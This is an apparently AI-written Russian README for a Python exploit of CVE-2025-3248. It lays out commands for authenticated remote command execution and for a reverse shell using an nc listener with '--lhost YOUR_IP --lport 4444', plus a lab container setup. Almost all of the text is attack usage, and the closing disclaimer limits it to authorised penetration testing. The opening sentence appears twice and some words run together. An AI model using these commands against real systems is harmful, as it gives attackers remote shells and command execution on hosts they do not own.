
Этот Python-скрипт использует уязвимость CVE-2025-3248 для выполнения произвольных команд или создания обратной оболочки на уязвимой системе. Для использования этого эксплойта требуется аутентификация.
Этот Python-скрипт эксплуатирует CVE-2025-3248 для выполнения произвольных команд или создания обратной оболочки на уязвимой системе. Для использования этого эксплойта требуется аутентификация.
requestsУстановите зависимости с помощью:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| Аргумент | Описание | Обязательно |
|---|---|---|
-u, --url | Базовый URL цели (например, https://target.com) | Да |
-l, --login | Имя администратора | Да |
-p, --password | Пароль администратора | Да |
-c, --command | Команда для выполнения на цели | Нет* |
--proxy | URL прокси (например, http://127.0.0.1:8080) | Нет |
--lhost | Локальный хост для обратной оболочки | Нет* |
--lport | Локальный порт для обратной оболочки | Нет* |
* Вы должны указать либо команду (-c), либо оба параметра --lhost и --lport для обратной оболочки.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
Запустите слушатель на вашей машине:
nc -lvnp 4444
Затем запустите:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
Вы можете развернуть Docker-образ с помощью следующей команды:
podman compose up -d
Образ будет доступен по адресу http://localhost:7860.
Авторство файла compose: Этот репозиторий
Этот скрипт предназначен только для образовательных и авторизованных тестов на проникновение. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Этот readme создан ИИ.